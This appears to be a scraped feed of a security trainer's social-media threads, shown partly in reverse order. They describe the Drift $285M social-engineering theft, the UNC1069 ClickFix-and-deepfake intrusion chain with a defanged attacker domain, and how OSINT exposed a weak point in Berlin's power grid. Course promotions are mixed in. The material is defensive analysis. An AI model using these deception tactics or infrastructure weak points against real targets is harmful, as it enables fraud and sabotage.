On April 1, 2026, as the $285 million was drained, the attackers scrubbed their Telegram chats and vanished.

Incident Background Update from Drift:

One contributor may have been compromised after cloning a code repository shared by the group as part of efforts to deploy a frontend for their vault. A second contributor was persuaded into downloading a wallet product via Apple's TestFlight to beta test the app.

🔹 𝐀 𝐫𝐞𝐥𝐚𝐭𝐢𝐨𝐧𝐬𝐡𝐢𝐩 𝐡𝐚𝐝 𝐛𝐞𝐞𝐧 𝐞𝐬𝐭𝐚𝐛𝐥𝐢𝐬𝐡𝐞𝐝, 𝐜𝐨𝐧𝐭𝐫𝐢𝐛𝐮𝐭𝐨𝐫𝐬 𝐝𝐢𝐝𝐧'𝐭 𝐭𝐡𝐢𝐧𝐤 𝐭𝐰𝐢𝐜𝐞 𝐰𝐡𝐞𝐧 𝐜𝐨𝐥𝐥𝐚𝐛𝐨𝐫𝐚𝐭𝐢𝐧𝐠 𝐝𝐢𝐠𝐢𝐭𝐚𝐥𝐥𝐲. Drift presumes there may have been multiple technical attack vectors:

..𝐓𝐡𝐞𝐬𝐞 𝐰𝐞𝐫𝐞 𝐧𝐨𝐭 𝐬𝐭𝐫𝐚𝐧𝐠𝐞𝐫𝐬; 𝐭𝐡𝐞𝐲 𝐰𝐞𝐫𝐞 𝐩𝐞𝐨𝐩𝐥𝐞 𝐃𝐫𝐢𝐟𝐭 𝐜𝐨𝐧𝐭𝐫𝐢𝐛𝐮𝐭𝐨𝐫𝐬 𝐡𝐚𝐝 𝐰𝐨𝐫𝐤𝐞𝐝 𝐰𝐢𝐭𝐡 𝐚𝐧𝐝 𝐦𝐞𝐭 𝐢𝐧 𝐩𝐞𝐫𝐬𝐨𝐧. (...) Links were shared for projects, tools, and apps they claimed to be building"

🔹 (excerpt from Drift's Incident Update): "Integration conversations continued through February & March 2026. (...) By this point, the relationship was nearly half a year old...

🔹 Dec. 2025 - Jan. 2026: To checkmate the game, the group onboarded an Ecosystem Vault on Drift. They engaged with the Drift contributors in working sessions, asked informed questions and eventually, they deposited over $1 Million of their own funds into the protocol

🔹 "What a pleasant coincidence running into you again!"

Over the next 6 months, the attackers deliberately sought out these same contributors at multiple global conferences. They wanted to continue building trust and credibility.

🔹 After the initial discussions, they moved their conversations to Telegram, where they spent months discussing legitimate trading strategies.

🔹 This group, posing as employees of a quantitative trading firm, first approached specific Drift contributors at a major crypto conference face-to-face. They wanted to discuss integrating with the platform.

Here is how it unfolded:
🔹Fall of 2025, a group of individuals (later linked to North Korea) started attending international crypto conferences, with a goal in mind.They were technically fluent,had fully constructed professional identities, & looked nothing like a North Korean

We know it happens, we talk about it in training, yet there is always a veil of doubt. Here is a rare public account of a #socialengineering op that started IN-PERSON & in a targeted way, ran for about 6 months, & cost Drift (a Solana-based DEX) $285 Million.
This is a truly sophisticated attack.🧵

Want a free ticket to Layer 8 Con? Sign up for "Social Engineering for Security Teams" by @christinalekati.bsky.social! A two-day immersive hands-on class that will teach all aspects of social engineering testing!

layer8conference.com www.zeffy.com/en-US/ticket...

VERY excited that I’ll be part of the @layer8conference.com this year delivering a keynote and a 2-day training class on Social Engineering!

Looking forward to meeting the Social Engineering & OSINT community in Boston. This will be fun! ✌🏻

"Proven play? Replay".

This is not a one time hit. Mandiant has observed UNC1069 using these techniques to target both corporate entities and individuals within the cryptocurrency industry, as well as venture capital firms and their employees or executives. The list will expand.

🔸 Embedded within the string of commands is a single command that initiates a multi-stage infection chain, ultimately deploying 7 distinct malware families (described in the report).

🔸 And then hey, "the audio is broken!". If only that could quickly get fixed...there are only 20 minutes left in the call.

This is where the ClickFix-style social engineering begins. The the threat actor directs the victim to run troubleshooting commands on their system to fix the issue.

🔸 The call begins. The victim sees the video of a CEO from another company.

Or, purportedly, their deepfake version.

𝘉𝘶𝘵, 𝘸𝘩𝘦𝘯 𝘢 𝘵𝘩𝘳𝘦𝘢𝘵 𝘢𝘤𝘵𝘰𝘳 𝘵𝘢𝘬𝘦𝘴 𝘵𝘩𝘦 𝘵𝘪𝘮𝘦 𝘵𝘰 𝘣𝘶𝘪𝘭𝘥 𝘵𝘳𝘶𝘴𝘵 𝘸𝘪𝘵𝘩 𝘢 𝘵𝘢𝘳𝘨𝘦𝘵 𝘧𝘪𝘳𝘴𝘵, 𝘵𝘩𝘦 𝘵𝘳𝘶𝘴𝘵-𝘵𝘳𝘢𝘯𝘴𝘧𝘦𝘳𝘦𝘯𝘤𝘦 𝘮𝘦𝘤𝘩𝘢𝘯𝘪𝘴𝘮 𝘬𝘪𝘤𝘬𝘴 𝘪𝘯. 𝘈𝘯𝘥 𝘵𝘩𝘦𝘯, 𝘵𝘩𝘦 𝘭𝘪𝘵𝘵𝘭𝘦 𝘳𝘦𝘥 𝘧𝘭𝘢𝘨𝘴 𝘵𝘩𝘢𝘵 𝘧𝘰𝘭𝘭𝘰𝘸 𝘵𝘦𝘯𝘥 𝘵𝘰 𝘨𝘦𝘵 𝘰𝘷𝘦𝘳𝘭𝘰𝘰𝘬𝘦𝘥. 𝘈𝘴 𝘵𝘩𝘦𝘺 𝘥𝘪𝘥.

🔸 The Calendly link redirects to a spoofed Zoom meeting hosted on the threat actor's infrastructure: zoom[.]uswe05[.]us

𝘛𝘩𝘪𝘴 𝘪𝘴 𝘵𝘩𝘦 𝘧𝘪𝘳𝘴𝘵 𝘰𝘣𝘷𝘪𝘰𝘶𝘴 𝘳𝘦𝘥 𝘧𝘭𝘢𝘨 𝘵𝘩𝘢𝘵 *𝘤𝘰𝘶𝘭𝘥* 𝘩𝘢𝘷𝘦 𝘣𝘦𝘦𝘯 𝘴𝘱𝘰𝘵𝘵𝘦𝘥.

𝐖𝐡𝐚𝐭 𝐡𝐚𝐩𝐩𝐞𝐧𝐞𝐝?

🔸 The threat actor initiates contact with a specific victim via Telegram, using a legit but compromised account of an executive,leverageing existing trust.

🔸 After building rapport through industry-specific conversation, they invite the victim to a call & send a Calendly link.

UNC1069 Targets Cryptocurrency Sector with New Tooling and AI-Enabled Social Engineering | Google Cloud Blog North Korean threat actors target the cryptocurrency industry using AI-enabled social engineering such as deepfakes, and ClickFix.

If you think AI and deepfakes are THE name of the game in "sophisticated" social engineering attacks, think again. AI-gen deepfakes are often just one step (a final blow) in a larger social engineering kill-chain.

In this week's SE case, we see a layered intrusion.

cloud.google.com/blog/topics/...

You will learn how to conduct an in-depth digital investigation on a subject, discover new leads, uncover and utilize all the evidence that are hiding in plain sight (and beyond) & conduct virtual HUMINT in an uncomplicated, step-by-step process.
P.S. There will be a class challenge, and a reward :)

Join @osintgeek.de and me on the 21st & 22nd of April for two days full of learning, hands-on exercises, real life case studies and the latests developments in #OSINT #SOCMINT and #HUMINT.

𝐎𝐮𝐫 "𝐅𝐮𝐧𝐝𝐚𝐦𝐞𝐧𝐭𝐚𝐥𝐬 𝐨𝐟 𝐂𝐲𝐛𝐞𝐫 𝐈𝐧𝐯𝐞𝐬𝐭𝐢𝐠𝐚𝐭𝐢𝐨𝐧𝐬 𝐚𝐧𝐝 𝐇𝐮𝐦𝐚𝐧 𝐈𝐧𝐭𝐞𝐥𝐥𝐢𝐠𝐞𝐧𝐜𝐞" 𝐜𝐥𝐚𝐬𝐬 𝐢𝐬 𝐫𝐞𝐭𝐮𝐫𝐧𝐢𝐧𝐠 𝐭𝐡𝐢𝐬 𝐬𝐩𝐫𝐢𝐧𝐠 𝐭𝐨 @blackhatevents.bsky.social 𝐀𝐬𝐢𝐚 𝐢𝐧 𝐒𝐢𝐧𝐠𝐚𝐩𝐨𝐫𝐞! 🎉

For details & registrations:
blackhat.com/asia-26/trai...

Aim for less detail in what can be visible, even through crowdsourced images.

🔹 Prioritize based on risk and take practical steps to implement better security measures on those vulnerable, identified spots before an adversary exploits them.

May the odds ever be in our favor ✨️

What can be done? If you work on securing a critical infrastructure entity:

🔹 Run your own OSINT analysis to identify vulnerabilities in advance. Know your level of exposure.

Control what you can:
🔹 Where possible, ask platforms to add blur or remove certain imagery.

It is scary easy for saboteurs or other attackers to find vulnerabilities on critical infrastructure free & available online, and to focus on the locations/points where an attack could have the maximum impact.
This incident has not been an isolated event.

There is more publicly available information and databases that can be researched, found, and used in similar acts of sabotage (or worse, given the geopolitical state we are currently in).

The Google street view imagery provides some extra help in reviewing some of the physical security and the surrounding area in preparation of a better plan.
The OpenInfraMap in combination with Google maps is just one simple example of potential adversarial OSINT.

Looking at the OpenInfraMap data in combination with satellite imagery, it is easy to see why this point of attack was chosen: all the 110 Κilovolt high-voltage lines that supply southwest Berlin converge into a single cable bridge that is overground, and easily accessible.